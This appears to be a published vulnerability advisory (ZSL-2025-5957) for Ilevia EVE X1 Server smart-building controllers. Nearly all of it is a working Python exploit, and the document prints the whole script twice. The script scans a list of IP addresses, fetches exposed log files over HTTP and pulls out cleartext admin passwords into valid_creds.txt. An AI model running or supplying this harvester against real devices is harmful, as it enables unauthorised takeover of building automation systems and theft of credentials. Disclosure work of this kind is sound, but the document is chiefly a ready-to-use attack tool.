Description
Title: Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure
Basic Information
ID
ZSL-2025-5957
Published
Aug 19, 2025 at 00:00
Affected Product
Affected Versions
#!/usr/bin/env python
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: A critical vulnerability was identified in the EVE smart home and BMS/BAS
# controller system due to improper handling of sensitive information in server-side
# logging. Specifically, .log files accessible via the web server expose cleartext
# credentials, including username and password submitted during authentication
# process. This disclosure enables unauthenticated remote attackers to retrieve
# valid login credentials simply by accessing exposed log files, leading to full
# system compromise.
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5957
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5957.php
#
# CWE ID: 532
# CWE URL: https://cwe.mitre.org/data/definitions/532.html
#
#
# 01.05.2024
#
import requests
import sys#####
import re######
def leak(line: str):
    """Pull the admin password out of a single EVE log line.

    The line is expected to carry ``Authenticate R:1 admin <password>``; the
    token that follows ``admin`` is returned, cut at the first whitespace or
    ``[`` character. Returns ``None`` when the pattern is absent.
    """
    pattern = re.compile(r'Authenticate R:1 admin\s+([^\s\[]+)')
    found = pattern.search(line)
    if found is None:
        return None
    return found.group(1)
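def target(ip, port):
    """Probe one host for an exposed EVE log and extract the admin password.

    Both known log locations under ``/80-history/`` are tried in turn. Any
    non-200 status (404 included) moves on to the next path; the original
    returned early on a 404 from the first path, which made ``eve.log``
    unreachable. A transport failure (timeout, refused connection) aborts
    the host, since the remaining path is served by the same web server.

    Returns ``"ip:port:admin:<password>"`` for the first matching line, or
    ``None`` when nothing leaked.
    """
    paths = [
        f"http://{ip}:{port}/80-history/eve-server.log",
        f"http://{ip}:{port}/80-history/eve.log",
    ]
    for url in paths:
        try:
            # Plain HTTP: the recovered credential crosses the wire in the
            # clear, just as it sits in the log; probe only networks you own.
            r = requests.get(url, timeout=5)
        except requests.exceptions.RequestException:
            return None
        if r.status_code != 200:
            continue
        # r.text loads the whole log into memory; logs on these devices can
        # be large, but the body is only scanned once, line by line.
        for line in r.text.splitlines():
            if "Authenticate R:1 admin" not in line:
                continue
            pwd = leak(line)
            if pwd:
                return f"{ip}:{port}:admin:{pwd}"
    return None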
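def main():
    """Scan every host in the list file and record any leaked admin credentials.

    Usage: ``script IPLIST.txt`` where each non-empty line is ``host`` or
    ``host:port`` (port defaults to 8080). Hits are printed as they are found
    and written to ``valid_creds.txt`` in the working directory.
    """
    import os  # local import: only used for the owner-only file create below

    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} IPLIST.txt")
        sys.exit(1)
    I_file = sys.argv[1]
    O_file = "valid_creds.txt"
    default_port = "8080"

    with open(I_file, "r", encoding="utf-8") as f:
        ip_list = [line.strip() for line in f if line.strip()]
    total = len(ip_list)

    results = []
    for idx, entry in enumerate(ip_list, 1):
        ip, port = _split_target(entry, default_port)
        print(f"[{idx}/{total}] Scanning {ip}:{port}...", end="\r")
        result = target(ip, port)
        if result:
            print(" " * 80, end="\r")
            print(f"[+] {result}")
            results.append(result)

    if not results:
        print("\n[-] No credentials leaked.")
        return
    # The output file holds cleartext passwords: create it owner-read/write
    # only (0o600) rather than relying on the umask. os.open's mode applies
    # only when the file is created; a pre-existing file keeps its old mode.
    fd = os.open(O_file, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as out:
        out.writelines(f"{line}\n" for line in results)
    print(f"\n[+] Done. {len(results)} valid credentials saved to {O_file}")


def _split_target(entry, default_port):
    """Split ``host`` or ``host:port`` on the first colon into (host, port) strings.

    NOTE(review): an unbracketed IPv6 literal would be split at its first
    colon; the list format is assumed to be hostnames or IPv4 addresses.
    """
    if ':' in entry:
        host, port = entry.split(':', 1)
        return host, port
    return entry, default_port


if __name__ == "__main__":
    main()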
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: A critical vulnerability was identified in the EVE smart home and BMS/BAS
# controller system due to improper handling of sensitive information in server-side
# logging. Specifically, .log files accessible via the web server expose cleartext
# credentials, including username and password submitted during authentication
# process. This disclosure enables unauthenticated remote attackers to retrieve
# valid login credentials simply by accessing exposed log files, leading to full
# system compromise.
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5957
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5957.php
#
# CWE ID: 532
# CWE URL: https://cwe.mitre.org/data/definitions/532.html
#
#
# 01.05.2024
#
import requests
import sys#####
import re######
def leak(line: str):
    """Pull the admin password out of a single EVE log line.

    The line is expected to carry ``Authenticate R:1 admin <password>``; the
    token that follows ``admin`` is returned, cut at the first whitespace or
    ``[`` character. Returns ``None`` when the pattern is absent.
    """
    pattern = re.compile(r'Authenticate R:1 admin\s+([^\s\[]+)')
    found = pattern.search(line)
    if found is None:
        return None
    return found.group(1)
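def target(ip, port):
    """Probe one host for an exposed EVE log and extract the admin password.

    Both known log locations under ``/80-history/`` are tried in turn. Any
    non-200 status (404 included) moves on to the next path; the original
    returned early on a 404 from the first path, which made ``eve.log``
    unreachable. A transport failure (timeout, refused connection) aborts
    the host, since the remaining path is served by the same web server.

    Returns ``"ip:port:admin:<password>"`` for the first matching line, or
    ``None`` when nothing leaked.
    """
    paths = [
        f"http://{ip}:{port}/80-history/eve-server.log",
        f"http://{ip}:{port}/80-history/eve.log",
    ]
    for url in paths:
        try:
            # Plain HTTP: the recovered credential crosses the wire in the
            # clear, just as it sits in the log; probe only networks you own.
            r = requests.get(url, timeout=5)
        except requests.exceptions.RequestException:
            return None
        if r.status_code != 200:
            continue
        # r.text loads the whole log into memory; logs on these devices can
        # be large, but the body is only scanned once, line by line.
        for line in r.text.splitlines():
            if "Authenticate R:1 admin" not in line:
                continue
            pwd = leak(line)
            if pwd:
                return f"{ip}:{port}:admin:{pwd}"
    return None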
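def main():
    """Scan every host in the list file and record any leaked admin credentials.

    Usage: ``script IPLIST.txt`` where each non-empty line is ``host`` or
    ``host:port`` (port defaults to 8080). Hits are printed as they are found
    and written to ``valid_creds.txt`` in the working directory.
    """
    import os  # local import: only used for the owner-only file create below

    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} IPLIST.txt")
        sys.exit(1)
    I_file = sys.argv[1]
    O_file = "valid_creds.txt"
    default_port = "8080"

    with open(I_file, "r", encoding="utf-8") as f:
        ip_list = [line.strip() for line in f if line.strip()]
    total = len(ip_list)

    results = []
    for idx, entry in enumerate(ip_list, 1):
        ip, port = _split_target(entry, default_port)
        print(f"[{idx}/{total}] Scanning {ip}:{port}...", end="\r")
        result = target(ip, port)
        if result:
            print(" " * 80, end="\r")
            print(f"[+] {result}")
            results.append(result)

    if not results:
        print("\n[-] No credentials leaked.")
        return
    # The output file holds cleartext passwords: create it owner-read/write
    # only (0o600) rather than relying on the umask. os.open's mode applies
    # only when the file is created; a pre-existing file keeps its old mode.
    fd = os.open(O_file, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as out:
        out.writelines(f"{line}\n" for line in results)
    print(f"\n[+] Done. {len(results)} valid credentials saved to {O_file}")


def _split_target(entry, default_port):
    """Split ``host`` or ``host:port`` on the first colon into (host, port) strings.

    NOTE(review): an unbracketed IPv6 literal would be split at its first
    colon; the list format is assumed to be hostnames or IPv4 addresses.
    """
    if ':' in entry:
        host, port = entry.split(':', 1)
        return host, port
    return entry, default_port


if __name__ == "__main__":
    main()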